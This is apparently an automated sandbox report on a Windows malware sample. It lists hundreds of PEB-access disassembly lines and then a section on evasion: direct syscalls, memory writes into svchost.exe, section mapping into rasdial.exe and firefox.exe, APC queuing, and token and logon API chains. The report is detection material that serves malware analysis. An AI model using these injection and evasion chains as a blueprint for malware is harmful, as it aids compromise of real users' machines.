            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E47A0 mov eax, dword ptr fs:[00000030h]1_2_031E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]1_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]1_2_031B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]1_2_031BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]1_2_03172619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]1_2_031AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]1_2_0314E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]1_2_03166620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]1_2_03168620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]1_2_0313262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]1_2_0314C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]1_2_03162674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]1_2_031666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]1_2_0316C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]1_2_031B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]1_2_031B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6500 mov eax, dword ptr fs:[00000030h]1_2_031C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03132582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03132582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03164588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03160854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03134859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_0009083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000909D5 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_00090C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe protection: read write
            Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe | Thread register set: target process: 8144
            Source: C:\Windows\SysWOW64\rasdial.exe | Thread APC queued: target process: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 24AE008
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000B2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
